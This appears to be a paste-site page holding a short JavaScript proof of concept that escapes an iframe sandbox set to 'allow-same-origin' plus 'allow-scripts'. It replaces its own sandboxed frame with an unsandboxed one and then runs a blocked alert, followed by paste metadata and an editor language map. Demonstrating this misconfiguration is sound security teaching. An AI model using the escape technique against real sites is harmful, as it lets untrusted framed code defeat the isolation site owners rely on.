if (window.top === this || window.parent === this) {
let message = "This page is meant to be loaded from within an iframe to demonstrate you can bypass sandbox attribute, when a combination of 'allow-same-origin' and 'allow-scripts' is used.";
document.body.innerText = message;
throw new Error(message);
}
const illegalCode = () => {
alert("You should not see me, because original iframe did not have 'allow-modals'. Kid page had allow-scripts and same-origin though. A new iframe without sandbox attribute was created - and here I am.");
}
const escape = () => {
document.body.innerText = "Loaded into a frame.";
let parent = window.parent;
let container = parent.document.getElementById("escapeMe");
if (parent.document.getElementById("escapeMe") != null) {
// Recreate and insert an iframe without sandbox attribute that
// plays by our rules.
let replacement = parent.document.createElement("iframe");
replacement.setAttribute("src", "kid.htm");
replacement.setAttribute("id", "escapedAlready")
parent.document.body.append(replacement);
// Remove original iframe (avoid an infinite loop)
container.parentNode.removeChild(container);
} else {
// Execute code that would be prevented by original iframe's sandbox.
illegalCode();
}
}
escape();
Replies to test
Title |
Name |
Language |
UNIX |
When |
Re: test |
sefa |
javascript |
1604855232 |
3 Years ago. |
{"html5":"htmlmixed","css":"css","javascript":"javascript","php":"php","python":"python","ruby":"ruby","lua":"text\/x-lua","bash":"text\/x-sh","go":"go","c":"text\/x-csrc","cpp":"text\/x-c++src","diff":"diff","latex":"stex","sql":"sql","xml":"xml","apl":"apl","asterisk":"asterisk","c_loadrunner":"text\/x-csrc","c_mac":"text\/x-csrc","coffeescript":"text\/x-coffeescript","csharp":"text\/x-csharp","d":"d","ecmascript":"javascript","erlang":"erlang","groovy":"text\/x-groovy","haskell":"text\/x-haskell","haxe":"text\/x-haxe","html4strict":"htmlmixed","java":"text\/x-java","java5":"text\/x-java","jquery":"javascript","mirc":"mirc","mysql":"sql","ocaml":"text\/x-ocaml","pascal":"text\/x-pascal","perl":"perl","perl6":"perl","plsql":"sql","properties":"text\/x-properties","q":"text\/x-q","scala":"scala","scheme":"text\/x-scheme","tcl":"text\/x-tcl","vb":"text\/x-vb","verilog":"text\/x-verilog","yaml":"text\/x-yaml","z80":"text\/x-z80"}